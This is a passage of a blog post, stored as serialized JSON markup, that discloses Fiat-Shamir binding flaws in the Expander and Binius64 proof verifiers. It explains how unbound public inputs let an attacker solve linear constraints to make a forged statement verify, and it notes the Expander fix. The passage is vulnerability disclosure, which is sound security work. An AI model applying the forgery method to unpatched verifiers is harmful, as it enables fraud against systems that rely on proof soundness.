verifier.",{"type":28,"tag":29,"props":120984,"children":120985},{},[120986],{"type":28,"tag":206,"props":120987,"children":120990},{"alt":120988,"src":120989},"9_expander","/posts/zkvms-unfaithful-claims/9_expander.svg",[],{"type":28,"tag":29,"props":120992,"children":120993},{},[120994,120995,121000],{"type":33,"value":16275},{"type":28,"tag":98,"props":120996,"children":120998},{"className":120997},[],[120999],{"type":33,"value":120879},{"type":33,"value":121001}," function computes a linear combination:",{"type":28,"tag":29,"props":121003,"children":121004},{},[121005],{"type":28,"tag":98,"props":121006,"children":121008},{"className":121007},[3652,3653],[121009],{"type":28,"tag":116,"props":121010,"children":121012},{"className":121011},[3658],[121013],{"type":28,"tag":116,"props":121014,"children":121016},{"className":121015,"ariaHidden":3664},[3663],[121017,121062,121186],{"type":28,"tag":116,"props":121018,"children":121020},{"className":121019},[3669],[121021,121025,121034,121039,121049,121053,121058],{"type":28,"tag":116,"props":121022,"children":121024},{"className":121023,"style":94076},[3674],[],{"type":28,"tag":116,"props":121026,"children":121028},{"className":121027},[3680,33],[121029],{"type":28,"tag":116,"props":121030,"children":121032},{"className":121031},[3680],[121033],{"type":33,"value":37171},{"type":28,"tag":116,"props":121035,"children":121037},{"className":121036,"style":92663},[3680],[121038],{"type":33,"value":2754},{"type":28,"tag":116,"props":121040,"children":121042},{"className":121041},[3680,33],[121043],{"type":28,"tag":116,"props":121044,"children":121046},{"className":121045},[3680],[121047],{"type":33,"value":121048},"cst",{"type":28,"tag":116,"props":121050,"children":121052},{"className":121051,"style":3857},[3759],[],{"type":28,"tag":116,"props":121054,"children":121056},{"className":121055},[3862],[121057],{"type":33,"value":373},{"type":28,"tag":116,"props":121059,"children":121061},{"className":121060,"style":3857},[3759],[],{"type":28,"tag":116,"props":121063,"children":121065},{"className":121064},[3669],[121066,121070,121127,121131,121158,121163,121168,121173,121177,121182],{"type":28,"tag":116,"props":121067,"children":121069},{"className":121068,"style":92605},[3674],[],{"type":28,"tag":116,"props":121071,"children":121073},{"className":121072},[21287],[121074,121079],{"type":28,"tag":116,"props":121075,"children":121077},{"className":121076,"style":21294},[21287,21292,21293],[121078],{"type":33,"value":108455},{"type":28,"tag":116,"props":121080,"children":121082},{"className":121081},[3695],[121083],{"type":28,"tag":116,"props":121084,"children":121086},{"className":121085},[3700,21305],[121087,121116],{"type":28,"tag":116,"props":121088,"children":121090},{"className":121089},[3705],[121091,121111],{"type":28,"tag":116,"props":121092,"children":121094},{"className":121093,"style":113867},[3710],[121095],{"type":28,"tag":116,"props":121096,"children":121097},{"style":21318},[121098,121102],{"type":28,"tag":116,"props":121099,"children":121101},{"className":121100,"style":3720},[3719],[],{"type":28,"tag":116,"props":121103,"children":121105},{"className":121104},[3725,3726,3727,3728],[121106],{"type":28,"tag":116,"props":121107,"children":121109},{"className":121108},[3680,21251,3728],[121110],{"type":33,"value":3408},{"type":28,"tag":116,"props":121112,"children":121114},{"className":121113},[21407],[121115],{"type":33,"value":21410},{"type":28,"tag":116,"props":121117,"children":121119},{"className":121118},[3705],[121120],{"type":28,"tag":116,"props":121121,"children":121123},{"className":121122,"style":114147},[3710],[121124],{"type":28,"tag":116,"props":121125,"children":121126},{},[],{"type":28,"tag":116,"props":121128,"children":121130},{"className":121129,"style":3798},[3759],[],{"type":28,"tag":116,"props":121132,"children":121134},{"className":121133},[3680],[121135,121144,121149],{"type":28,"tag":116,"props":121136,"children":121138},{"className":121137},[3680,33],[121139],{"type":28,"tag":116,"props":121140,"children":121142},{"className":121141},[3680],[121143],{"type":33,"value":61294},{"type":28,"tag":116,"props":121145,"children":121147},{"className":121146,"style":92663},[3680],[121148],{"type":33,"value":2754},{"type":28,"tag":116,"props":121150,"children":121152},{"className":121151},[3680,33],[121153],{"type":28,"tag":116,"props":121154,"children":121156},{"className":121155},[3680],[121157],{"type":33,"value":8039},{"type":28,"tag":116,"props":121159,"children":121161},{"className":121160},[21380],[121162],{"type":33,"value":347},{"type":28,"tag":116,"props":121164,"children":121166},{"className":121165},[3680,21251],[121167],{"type":33,"value":3408},{"type":28,"tag":116,"props":121169,"children":121171},{"className":121170},[21401],[121172],{"type":33,"value":15074},{"type":28,"tag":116,"props":121174,"children":121176},{"className":121175,"style":3760},[3759],[],{"type":28,"tag":116,"props":121178,"children":121180},{"className":121179},[3765],[121181],{"type":33,"value":110922},{"type":28,"tag":116,"props":121183,"children":121185},{"className":121184,"style":3760},[3759],[],{"type":28,"tag":116,"props":121187,"children":121189},{"className":121188},[3669],[121190,121194,121203,121208,121213,121218,121222,121271],{"type":28,"tag":116,"props":121191,"children":121193},{"className":121192,"style":3780},[3674],[],{"type":28,"tag":116,"props":121195,"children":121197},{"className":121196},[3680,33],[121198],{"type":28,"tag":116,"props":121199,"children":121201},{"className":121200},[3680],[121202],{"type":33,"value":112249},{"type":28,"tag":116,"props":121204,"children":121206},{"className":121205},[21380],[121207],{"type":33,"value":313},{"type":28,"tag":116,"props":121209,"children":121211},{"className":121210},[3680,21251],[121212],{"type":33,"value":3408},{"type":28,"tag":116,"props":121214,"children":121216},{"className":121215},[3791],[121217],{"type":33,"value":3794},{"type":28,"tag":116,"props":121219,"children":121221},{"className":121220,"style":3798},[3759],[],{"type":28,"tag":116,"props":121223,"children":121225},{"className":121224},[3680,111809],[121226],{"type":28,"tag":116,"props":121227,"children":121229},{"className":121228},[3700],[121230],{"type":28,"tag":116,"props":121231,"children":121233},{"className":121232},[3705],[121234],{"type":28,"tag":116,"props":121235,"children":121237},{"className":121236,"style":111895},[3710],[121238,121250],{"type":28,"tag":116,"props":121239,"children":121240},{"style":111826},[121241,121245],{"type":28,"tag":116,"props":121242,"children":121244},{"className":121243,"style":111831},[3719],[],{"type":28,"tag":116,"props":121246,"children":121248},{"className":121247,"style":92663},[3680,21251],[121249],{"type":33,"value":93482},{"type":28,"tag":116,"props":121251,"children":121252},{"style":111826},[121253,121257],{"type":28,"tag":116,"props":121254,"children":121256},{"className":121255,"style":111831},[3719],[],{"type":28,"tag":116,"props":121258,"children":121260},{"className":121259,"style":111919},[111849],[121261],{"type":28,"tag":116,"props":121262,"children":121264},{"className":121263,"style":111925},[111924],[121265],{"type":28,"tag":33904,"props":121266,"children":121267},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[121268],{"type":28,"tag":111937,"props":121269,"children":121270},{"d":111939},[],{"type":28,"tag":116,"props":121272,"children":121274},{"className":121273},[21401],[121275],{"type":33,"value":1829},{"type":28,"tag":29,"props":121277,"children":121278},{},[121279,121280,121349,121351,121356,121358,121363],{"type":33,"value":115496},{"type":28,"tag":98,"props":121281,"children":121283},{"className":121282},[3652,3653],[121284],{"type":28,"tag":116,"props":121285,"children":121287},{"className":121286},[3658],[121288],{"type":28,"tag":116,"props":121289,"children":121291},{"className":121290,"ariaHidden":3664},[3663],[121292],{"type":28,"tag":116,"props":121293,"children":121295},{"className":121294},[3669],[121296,121300],{"type":28,"tag":116,"props":121297,"children":121299},{"className":121298,"style":111895},[3674],[],{"type":28,"tag":116,"props":121301,"children":121303},{"className":121302},[3680,111809],[121304],{"type":28,"tag":116,"props":121305,"children":121307},{"className":121306},[3700],[121308],{"type":28,"tag":116,"props":121309,"children":121311},{"className":121310},[3705],[121312],{"type":28,"tag":116,"props":121313,"children":121315},{"className":121314,"style":111895},[3710],[121316,121328],{"type":28,"tag":116,"props":121317,"children":121318},{"style":111826},[121319,121323],{"type":28,"tag":116,"props":121320,"children":121322},{"className":121321,"style":111831},[3719],[],{"type":28,"tag":116,"props":121324,"children":121326},{"className":121325,"style":92663},[3680,21251],[121327],{"type":33,"value":93482},{"type":28,"tag":116,"props":121329,"children":121330},{"style":111826},[121331,121335],{"type":28,"tag":116,"props":121332,"children":121334},{"className":121333,"style":111831},[3719],[],{"type":28,"tag":116,"props":121336,"children":121338},{"className":121337,"style":111919},[111849],[121339],{"type":28,"tag":116,"props":121340,"children":121342},{"className":121341,"style":111925},[111924],[121343],{"type":28,"tag":33904,"props":121344,"children":121345},{"xmlns":111929,"width":111930,"height":111931,"style":111932,"viewBox":111933,"preserveAspectRatio":111934},[121346],{"type":28,"tag":111937,"props":121347,"children":121348},{"d":111939},[],{"type":33,"value":121350}," contains the challenges. Since challenges are derived before the statement data is bound, they are independent of ",{"type":28,"tag":98,"props":121352,"children":121354},{"className":121353},[],[121355],{"type":33,"value":120940},{"type":33,"value":121357},". This lets an attacker choose an arbitrary false statement (e.g., a forged output) and then solve the induced linear constraints for a modified ",{"type":28,"tag":98,"props":121359,"children":121361},{"className":121360},[],[121362],{"type":33,"value":120940},{"type":33,"value":121364}," that makes the verifier's check pass.",{"type":28,"tag":29,"props":121366,"children":121367},{},[121368,121372,121374,121381,121382,121385,121392],{"type":28,"tag":4995,"props":121369,"children":121370},{},[121371],{"type":33,"value":116370},{"type":33,"value":121373}," Fixed on 21st January 2026 via ",{"type":28,"tag":87,"props":121375,"children":121378},{"href":121376,"rel":121377},"https://github.com/PolyhedraZK/Expander/commit/4a8c2be03535194c1f6b48a93ad2f5480649f7c2",[91],[121379],{"type":33,"value":121380},"commit 4a8c2be",{"type":33,"value":6129},{"type":28,"tag":30624,"props":121383,"children":121384},{},[],{"type":28,"tag":87,"props":121386,"children":121389},{"href":121387,"rel":121388},"https://blog.polyhedra.network/expander-bug-bounty/",[91],[121390],{"type":33,"value":121391},"Claimed 500k Bug bounty",{"type":33,"value":121393}," award pending",{"type":28,"tag":18457,"props":121395,"children":121396},{},[],{"type":28,"tag":75,"props":121398,"children":121400},{"id":121399},"binius64",[121401],{"type":33,"value":107503},{"type":28,"tag":29,"props":121403,"children":121404},{},[121405,121407,121534],{"type":33,"value":121406},"Binius64 is a proof system optimized for binary fields, designed to be efficient on 64-bit CPUs. Binius uses ",{"type":28,"tag":98,"props":121408,"children":121410},{"className":121409},[3652,3653],[121411],{"type":28,"tag":116,"props":121412,"children":121414},{"className":121413},[3658],[121415],{"type":28,"tag":116,"props":121416,"children":121418},{"className":121417,"ariaHidden":3664},[3663],[121419],{"type":28,"tag":116,"props":121420,"children":121422},{"className":121421},[3669],[121423,121428],{"type":28,"tag":116,"props":121424,"children":121427},{"className":121425,"style":121426},[3674],"height:0.8665em;vertical-align:-0.1776em;",[],{"type":28,"tag":116,"props":121429,"children":121431},{"className":121430},[3680],[121432,121439],{"type":28,"tag":116,"props":121433,"children":121436},{"className":121434},[3680,121435],"mathbb",[121437],{"type":33,"value":121438},"F",{"type":28,"tag":116,"props":121440,"children":121442},{"className":121441},[3695],[121443],{"type":28,"tag":116,"props":121444,"children":121446},{"className":121445},[3700,21305],[121447,121522],{"type":28,"tag":116,"props":121448,"children":121450},{"className":121449},[3705],[121451,121517],{"type":28,"tag":116,"props":121452,"children":121454},{"className":121453,"style":111992},[3710],[121455],{"type":28,"tag":116,"props":121456,"children":121458},{"style":121457},"top:-2.5224em;margin-left:0em;margin-right:0.05em;",[121459,121463],{"type":28,"tag":116,"props":121460,"children":121462},{"className":121461,"style":3720},[3719],[],{"type":28,"tag":116,"props":121464,"children":121466},{"className":121465},[3725,3726,3727,3728],[121467],{"type":28,"tag":116,"props":121468,"children":121470},{"className":121469},[3680,3728],[121471],{"type":28,"tag":116,"props":121472,"children":121474},{"className":121473},[3680,3728],[121475,121480],{"type":28,"tag":116,"props":121476,"children":121478},{"className":121477},[3680,3728],[121479],{"type":33,"value":2794},{"type":28,"tag":116,"props":121481,"children":121483},{"className":121482},[3695],[121484],{"type":28,"tag":116,"props":121485,"children":121487},{"className":121486},[3700],[121488],{"type":28,"tag":116,"props":121489,"children":121491},{"className":121490},[3705],[121492],{"type":28,"tag":116,"props":121493,"children":121496},{"className":121494,"style":121495},[3710],"height:0.7463em;",[121497],{"type":28,"tag":116,"props":121498,"children":121499},{"style":112117},[121500,121504],{"type":28,"tag":116,"props":121501,"children":121503},{"className":121502,"style":108520},[3719],[],{"type":28,"tag":116,"props":121505,"children":121507},{"className":121506},[3725,108525,108526,3728],[121508],{"type":28,"tag":116,"props":121509,"children":121511},{"className":121510},[3680,3728],[121512],{"type":28,"tag":116,"props":121513,"children":121515},{"className":121514},[3680,3728],[121516],{"type":33,"value":29503},{"type":28,"tag":116,"props":121518,"children":121520},{"className":121519},[21407],[121521],{"type":33,"value":21410},{"type":28,"tag":116,"props":121523,"children":121525},{"className":121524},[3705],[121526],{"type":28,"tag":116,"props":121527,"children":121530},{"className":121528,"style":121529},[3710],"height:0.1776em;",[121531],{"type":28,"tag":116,"props":121532,"children":121533},{},[],{"type":33,"value":121535}," (or variants thereof), where addition is XOR. This makes certain operations very fast.",{"type":28,"tag":29,"props":121537,"children":121538},{},[121539,121541,121546],{"type":33,"value":121540},"One of Binius's key features is its specialized protocols for bitwise operations. The ",{"type":28,"tag":4995,"props":121542,"children":121543},{},[121544],{"type":33,"value":121545},"Shift Protocol",{"type":33,"value":121547}," efficiently handles bit-shifts and rotations (essential for hash functions like SHA-256) without the massive overhead typical in other proof systems.",{"type":28,"tag":29,"props":121549,"children":121550},{},[121551],{"type":28,"tag":4995,"props":121552,"children":121553},{},[121554],{"type":33,"value":120972},{"type":28,"tag":29,"props":121556,"children":121557},{},[121558],{"type":33,"value":121559},"The verifier receives the public witness (program inputs/outputs) as a separate parameter:",{"type":28,"tag":234,"props":121561,"children":121563},{"code":121562,"language":2651,"meta":7,"className":2652,"style":7},"pub fn verify\u003CF, C>(\n    constraint_system: &ConstraintSystem,\n    public: &[Word],    // \u003C- NEVER ABSORBED\n    // ...\n) -> Result\u003CVerifyOutput\u003CF>, Error>\n",[121564],{"type":28,"tag":98,"props":121565,"children":121566},{"__ignoreMap":7},[121567,121602,121627,121661,121669],{"type":28,"tag":116,"props":121568,"children":121569},{"class":245,"line":246},[121570,121574,121578,121582,121586,121590,121594,121598],{"type":28,"tag":116,"props":121571,"children":121572},{"style":376},[121573],{"type":33,"value":13356},{"type":28,"tag":116,"props":121575,"children":121576},{"style":376},[121577],{"type":33,"value":13361},{"type":28,"tag":116,"props":121579,"children":121580},{"style":282},[121581],{"type":33,"value":7838},{"type":28,"tag":116,"props":121583,"children":121584},{"style":266},[121585],{"type":33,"value":514},{"type":28,"tag":116,"props":121587,"children":121588},{"style":339},[121589],{"type":33,"value":121438},{"type":28,"tag":116,"props":121591,"children":121592},{"style":266},[121593],{"type":33,"value":825},{"type":28,"tag":116,"props":121595,"children":121596},{"style":339},[121597],{"type":33,"value":115889},{"type":28,"tag":116,"props":121599,"children":121600},{"style":266},[121601],{"type":33,"value":6260},{"type":28,"tag":116,"props":121603,"children":121604},{"class":245,"line":256},[121605,121610,121614,121618,121623],{"type":28,"tag":116,"props":121606,"children":121607},{"style":272},[121608],{"type":33,"value":121609},"    constraint_system",{"type":28,"tag":116,"props":121611,"children":121612},{"style":370},[121613],{"type":33,"value":4160},{"type":28,"tag":116,"props":121615,"children":121616},{"style":370},[121617],{"type":33,"value":6813},{"type":28,"tag":116,"props":121619,"children":121620},{"style":339},[121621],{"type":33,"value":121622},"ConstraintSystem",{"type":28,"tag":116,"props":121624,"children":121625},{"style":266},[121626],{"type":33,"value":3178},{"type":28,"tag":116,"props":121628,"children":121629},{"class":245,"line":293},[121630,121634,121638,121642,121646,121651,121656],{"type":28,"tag":116,"props":121631,"children":121632},{"style":272},[121633],{"type":33,"value":7193},{"type":28,"tag":116,"props":121635,"children":121636},{"style":370},[121637],{"type":33,"value":4160},{"type":28,"tag":116,"props":121639,"children":121640},{"style":370},[121641],{"type":33,"value":6813},{"type":28,"tag":116,"props":121643,"children":121644},{"style":266},[121645],{"type":33,"value":347},{"type":28,"tag":116,"props":121647,"children":121648},{"style":339},[121649],{"type":33,"value":121650},"Word",{"type":28,"tag":116,"props":121652,"children":121653},{"style":266},[121654],{"type":33,"value":121655},"],    ",{"type":28,"tag":116,"props":121657,"children":121658},{"style":250},[121659],{"type":33,"value":121660},"// \u003C- NEVER ABSORBED\n",{"type":28,"tag":116,"props":121662,"children":121663},{"class":245,"line":361},[121664],{"type":28,"tag":116,"props":121665,"children":121666},{"style":250},[121667],{"type":33,"value":121668},"    // ...\n",{"type":28,"tag":116,"props":121670,"children":121671},{"class":245,"line":387},[121672,121676,121680,121684,121688,121693,121697,121701,121705,121709],{"type":28,"tag":116,"props":121673,"children":121674},{"style":266},[121675],{"type":33,"value":1609},{"type":28,"tag":116,"props":121677,"children":121678},{"style":370},[121679],{"type":33,"value":13423},{"type":28,"tag":116,"props":121681,"children":121682},{"style":339},[121683],{"type":33,"value":13428},{"type":28,"tag":116,"props":121685,"children":121686},{"style":266},[121687],{"type":33,"value":514},{"type":28,"tag":116,"props":121689,"children":121690},{"style":339},[121691],{"type":33,"value":121692},"VerifyOutput",{"type":28,"tag":116,"props":121694,"children":121695},{"style":266},[121696],{"type":33,"value":514},{"type":28,"tag":116,"props":121698,"children":121699},{"style":339},[121700],{"type":33,"value":121438},{"type":28,"tag":116,"props":121702,"children":121703},{"style":266},[121704],{"type":33,"value":6302},{"type":28,"tag":116,"props":121706,"children":121707},{"style":339},[121708],{"type":33,"value":37022},{"type":28,"tag":116,"props":121710,"children":121711},{"style":266},[121712],{"type":33,"value":506},{"type":28,"tag":29,"props":121714,"children":121715},{},[121716,121718,121724,121725,121731,121733,121737],{"type":33,"value":121717},"In the shift protocol, challenges ",{"type":28,"tag":98,"props":121719,"children":121721},{"className":121720},[],[121722],{"type":33,"value":121723},"r_j",{"type":33,"value":10659},{"type":28,"tag":98,"props":121726,"children":121728},{"className":121727},[],[121729],{"type":33,"value":121730},"inout_eval_point",{"type":33,"value":121732}," are sampled ",{"type":28,"tag":4995,"props":121734,"children":121735},{},[121736],{"type":33,"value":104204},{"type":33,"value":121738}," the public witness is bound.",{"type":28,"tag":29,"props":121740,"children":121741},{},[121742],{"type":28,"tag":4995,"props":121743,"children":121744},{},[121745],{"type":33,"value":115092},{"type":28,"tag":29,"props":121747,"children":121748},{},[121749],{"type":28,"tag":206,"props":121750,"children":121753},{"alt":121751,"src":121752},"10_binius","/posts/zkvms-unfaithful-claims/10_binius.svg",[],{"type":28,"tag":29,"props":121755,"children":121756},{},[121757],{"type":33,"value":121758},"During verification",{"type":28,"tag":455,"props":121760,"children":121761},{},[121762,121782,121794,121813],{"type":28,"tag":459,"props":121763,"children":121764},{},[121765,121767,121772,121774,121780],{"type":33,"value":121766},"Sumcheck produces challenge points ",{"type":28,"tag":98,"props":121768,"children":121770},{"className":121769},[],[121771],{"type":33,"value":121723},{"type":33,"value":121773}," (bit indices) and ",{"type":28,"tag":98,"props":121775,"children":121777},{"className":121776},[],[121778],{"type":33,"value":121779},"r_s",{"type":33,"value":121781}," (shift indices)",{"type":28,"tag":459,"props":121783,"children":121784},{},[121785,121787,121792],{"type":33,"value":121786},"Verifier samples ",{"type":28,"tag":98,"props":121788,"children":121790},{"className":121789},[],[121791],{"type":33,"value":121730},{"type":33,"value":121793}," from transcript",{"type":28,"tag":459,"props":121795,"children":121796},{},[121797,121799,121805,121807,121812],{"type":33,"value":121798},"Verifier computes ",{"type":28,"tag":98,"props":121800,"children":121802},{"className":121801},[],[121803],{"type":33,"value":121804},"public_eval = MLE(public, r_j, inout_eval_point)",{"type":33,"value":121806}," using the unbound ",{"type":28,"tag":98,"props":121808,"children":121810},{"className":121809},[],[121811],{"type":33,"value":61294},{"type":33,"value":17796},{"type":28,"tag":459,"props":121814,"children":121815},{},[121816,121817,121823],{"type":33,"value":16275},{"type":28,"tag":98,"props":121818,"children":121820},{"className":121819},[],[121821],{"type":33,"value":121822},"public_eval",{"type":33,"value":121824}," feeds into subsequent verification equations",{"type":28,"tag":29,"props":121826,"children":121827},{},[121828],{"type":33,"value":121829},"The MLE evaluation is linear in the public witness bits:",{"type":28,"tag":29,"props":121831,"children":121832},{},[121833],{"type":28,"tag":98,"props":121834,"children":121836},{"className":121835},[3652,3653],[121837],{"type":28,"tag":116,"props":121838,"children":121840},{"className":121839},[3658],[121841],{"type":28,"tag":116,"props":121842,"children":121844},{"className":121843,"ariaHidden":3664},[3663],[121845,121889,122029,122141],{"type":28,"tag":116,"props":121846,"children":121848},{"className":121847},[3669],[121849,121853,121862,121867,121876,121880,121885],{"type":28,"tag":116,"props":121850,"children":121852},{"className":121851,"style":94076},[3674],[],{"type":28,"tag":116,"props":121854,"children":121856},{"className":121855},[3680,33],[121857],{"type":28,"tag":116,"props":121858,"children":121860},{"className":121859},[3680],[121861],{"type":33,"value":61294},{"type":28,"tag":116,"props":121863,"children":121865},{"className":121864,"style":92663},[3680],[121866],{"type":33,"value":2754},{"type":28,"tag":116,"props":121868,"children":121870},{"className":121869},[3680,33],[121871],{"type":28,"tag":116,"props":121872,"children":121874},{"className":121873},[3680],[121875],{"type":33,"value":37171},{"type":28,"tag":116,"props":121877,"children":121879},{"className":121878,"style":3857},[3759],[],{"type":28,"tag":116,"props":121881,"children":121883},{"className":121882},[3862],[121884],{"type":33,"value":373},{"type":28,"tag":116,"props":121886,"children":121888},{"className":121887,"style":3857},[3759],[],{"type":28,"tag":116,"props":121890,"children":121892},{"className":121891},[3669],[121893,121897,121969,121973,121986,121991,121996,122001,122006,122011,122016,122020,122025],{"type":28,"tag":116,"props":121894,"children":121896},{"className":121895,"style":118422},[3674],[],{"type":28,"tag":116,"props":121898,"children":121900},{"className":121899},[21287],[121901,121906],{"type":28,"tag":116,"props":121902,"children":121904},{"className":121903,"style":21294},[21287,21292,21293],[121905],{"type":33,"value":108455},{"type":28,"tag":116,"props":121907,"children":121909},{"className":121908},[3695],[121910],{"type":28,"tag":116,"props":121911,"children":121913},{"className":121912},[3700,21305],[121914,121958],{"type":28,"tag":116,"props":121915,"children":121917},{"className":121916},[3705],[121918,121953],{"type":28,"tag":116,"props":121919,"children":121921},{"className":121920,"style":113332},[3710],[121922],{"type":28,"tag":116,"props":121923,"children":121924},{"style":21318},[121925,121929],{"type":28,"tag":116,"props":121926,"children":121928},{"className":121927,"style":3720},[3719],[],{"type":28,"tag":116,"props":121930,"children":121932},{"className":121931},[3725,3726,3727,3728],[121933],{"type":28,"tag":116,"props":121934,"children":121936},{"className":121935},[3680,3728],[121937,121943,121948],{"type":28,"tag":116,"props":121938,"children":121941},{"className":121939,"style":121940},[3680,21251,3728],"margin-right:0.02691em;",[121942],{"type":33,"value":49193},{"type":28,"tag":116,"props":121944,"children":121946},{"className":121945},[3791,3728],[121947],{"type":33,"value":3794},{"type":28,"tag":116,"props":121949,"children":121951},{"className":121950},[3680,21251,3728],[121952],{"type":33,"value":2893},{"type":28,"tag":116,"props":121954,"children":121956},{"className":121955},[21407],[121957],{"type":33,"value":21410},{"type":28,"tag":116,"props":121959,"children":121961},{"className":121960},[3705],[121962],{"type":28,"tag":116,"props":121963,"children":121965},{"className":121964,"style":113898},[3710],[121966],{"type":28,"tag":116,"props":121967,"children":121968},{},[],{"type":28,"tag":116,"props":121970,"children":121972},{"className":121971,"style":3798},[3759],[],{"type":28,"tag":116,"props":121974,"children":121976},{"className":121975},[3680],[121977],{"type":28,"tag":116,"props":121978,"children":121980},{"className":121979},[3680,33],[121981],{"type":28,"tag":116,"props":121982,"children":121984},{"className":121983},[3680],[121985],{"type":33,"value":61294},{"type":28,"tag":116,"props":121987,"children":121989},{"className":121988},[21380],[121990],{"type":33,"value":347},{"type":28,"tag":116,"props":121992,"children":121994},{"className":121993,"style":121940},[3680,21251],[121995],{"type":33,"value":49193},{"type":28,"tag":116,"props":121997,"children":121999},{"className":121998},[21401],[122000],{"type":33,"value":15074},{"type":28,"tag":116,"props":122002,"children":122004},{"className":122003},[21380],[122005],{"type":33,"value":347},{"type":28,"tag":116,"props":122007,"children":122009},{"className":122008},[3680,21251],[122010],{"type":33,"value":2893},{"type":28,"tag":116,"props":122012,"children":122014},{"className":122013},[21401],[122015],{"type":33,"value":15074},{"type":28,"tag":116,"props":122017,"children":122019},{"className":122018,"style":3760},[3759],[],{"type":28,"tag":116,"props":122021,"children":122023},{"className":122022},[3765],[122024],{"type":33,"value":110922},{"type":28,"tag":116,"props":122026,"children":122028},{"className":122027,"style":3760},[3759],[],{"type":28,"tag":116,"props":122030,"children":122032},{"className":122031},[3669],[122033,122038,122047,122052,122057,122062,122066,122123,122128,122132,122137],{"type":28,"tag":116,"props":122034,"children":122037},{"className":122035,"style":122036},[3674],"height:1.0361em;vertical-align:-0.2861em;",[],{"type":28,"tag":116,"props":122039,"children":122041},{"className":122040},[3680,33],[122042],{"type":28,"tag":116,"props":122043,"children":122045},{"className":122044},[3680],[122046],{"type":33,"value":112249},{"type":28,"tag":116,"props":122048,"children":122050},{"className":122049},[21380],[122051],{"type":33,"value":313},{"type":28,"tag":116,"props":122053,"children":122055},{"className":122054},[3680,21251],[122056],{"type":33,"value":2893},{"type":28,"tag":116,"props":122058,"children":122060},{"className":122059},[3791],[122061],{"type":33,"value":3794},{"type":28,"tag":116,"props":122063,"children":122065},{"className":122064,"style":3798},[3759],[],{"type":28,"tag":116,"props":122067,"children":122069},{"className":122068},[3680],[122070,122075],{"type":28,"tag":116,"props":122071,"children":122073},{"className":122072,"style":92663},[3680,21251],[122074],{"type":33,"value":93482},{"type":28,"tag":116,"props":122076,"children":122078},{"className":122077},[3695],[122079],{"type":28,"tag":116,"props":122080,"children":122082},{"className":122081},[3700,21305],[122083,122112],{"type":28,"tag":116,"props":122084,"children":122086},{"className":122085},[3705],[122087,122107],{"type":28,"tag":116,"props":122088,"children":122090},{"className":122089,"style":93192},[3710],[122091],{"type":28,"tag":116,"props":122092,"children":122093},{"style":109659},[122094,122098],{"type":28,"tag":116,"props":122095,"children":122097},{"className":122096,"style":3720},[3719],[],{"type":28,"tag":116,"props":122099,"children":122101},{"className":122100},[3725,3726,3727,3728],[122102],{"type":28,"tag":116,"props":122103,"children":122105},{"className":122104,"style":113883},[3680,21251,3728],[122106],{"type":33,"value":8328},{"type":28,"tag":116,"props":122108,"children":122110},{"className":122109},[21407],[122111],{"type":33,"value":21410},{"type":28,"tag":116,"props":122113,"children":122115},{"className":122114},[3705],[122116],{"type":28,"tag":116,"props":122117,"children":122119},{"className":122118,"style":118570},[3710],[122120],{"type":28,"tag":116,"props":122121,"children":122122},{},[],{"type":28,"tag":116,"props":122124,"children":122126},{"className":122125},[21401],[122127],{"type":33,"value":1829},{"type":28,"tag":116,"props":122129,"children":122131},{"className":122130,"style":3760},[3759],[],{"type":28,"tag":116,"props":122133,"children":122135},{"className":122134},[3765],[122136],{"type":33,"value":110922},{"type":28,"tag":116,"props":122138,"children":122140},{"className":122139,"style":3760},[3759],[],{"type":28,"tag":116,"props":122142,"children":122144},{"className":122143},[3669],[122145,122149,122158,122163,122168,122173,122177,122187,122192,122201,122206,122215],{"type":28,"tag":116,"props":122146,"children":122148},{"className":122147,"style":92605},[3674],[],{"type":28,"tag":116,"props":122150,"children":122152},{"className":122151},[3680,33],[122153],{"type":28,"tag":116,"props":122154,"children":122156},{"className":122155},[3680],[122157],{"type":33,"value":112249},{"type":28,"tag":116,"props":122159,"children":122161},{"className":122160},[21380],[122162],{"type":33,"value":313},{"type":28,"tag":116,"props":122164,"children":122166},{"className":122165,"style":121940},[3680,21251],[122167],{"type":33,"value":49193},{"type":28,"tag":116,"props":122169,"children":122171},{"className":122170},[3791],[122172],{"type":33,"value":3794},{"type":28,"tag":116,"props":122174,"children":122176},{"className":122175,"style":3798},[3759],[],{"type":28,"tag":116,"props":122178,"children":122180},{"className":122179},[3680,33],[122181],{"type":28,"tag":116,"props":122182,"children":122184},{"className":122183},[3680],[122185],{"type":33,"value":122186},"inout",{"type":28,"tag":116,"props":122188,"children":122190},{"className":122189,"style":92663},[3680],[122191],{"type":33,"value":2754},{"type":28,"tag":116,"props":122193,"children":122195},{"className":122194},[3680,33],[122196],{"type":28,"tag":116,"props":122197,"children":122199},{"className":122198},[3680],[122200],{"type":33,"value":37171},{"type":28,"tag":116,"props":122202,"children":122204},{"className":122203,"style":92663},[3680],[122205],{"type":33,"value":2754},{"type":28,"tag":116,"props":122207,"children":122209},{"className":122208},[3680,33],[122210],{"type":28,"tag":116,"props":122211,"children":122213},{"className":122212},[3680],[122214],{"type":33,"value":117445},{"type":28,"tag":116,"props":122216,"children":122218},{"className":122217},[21401],[122219],{"type":33,"value":1829},{"type":28,"tag":29,"props":122221,"children":122222},{},[122223,122225,122230,122232,122305],{"type":33,"value":122224},"With challenges fixed (independent of ",{"type":28,"tag":98,"props":122226,"children":122228},{"className":122227},[],[122229],{"type":33,"value":61294},{"type":33,"value":122231},"), an attacker can find an alternate witness ",{"type":28,"tag":98,"props":122233,"children":122235},{"className":122234},[3652,3653],[122236],{"type":28,"tag":116,"props":122237,"children":122239},{"className":122238},[3658],[122240],{"type":28,"tag":116,"props":122241,"children":122243},{"className":122242,"ariaHidden":3664},[3663],[122244],{"type":28,"tag":116,"props":122245,"children":122247},{"className":122246},[3669],[122248,122253],{"type":28,"tag":116,"props":122249,"children":122252},{"className":122250,"style":122251},[3674],"height:1.0307em;vertical-align:-0.1944em;",[],{"type":28,"tag":116,"props":122254,"children":122256},{"className":122255},[3680],[122257,122266],{"type":28,"tag":116,"props":122258,"children":122260},{"className":122259},[3680,33],[122261],{"type":28,"tag":116,"props":122262,"children":122264},{"className":122263},[3680],[122265],{"type":33,"value":61294},{"type":28,"tag":116,"props":122267,"children":122269},{"className":122268},[3695],[122270],{"type":28,"tag":116,"props":122271,"children":122273},{"className":122272},[3700],[122274],{"type":28,"tag":116,"props":122275,"children":122277},{"className":122276},[3705],[122278],{"type":28,"tag":116,"props":122279,"children":122282},{"className":122280,"style":122281},[3710],"height:0.8362em;",[122283],{"type":28,"tag":116,"props":122284,"children":122286},{"style":122285},"top:-3.1473em;margin-right:0.05em;",[122287,122291],{"type":28,"ta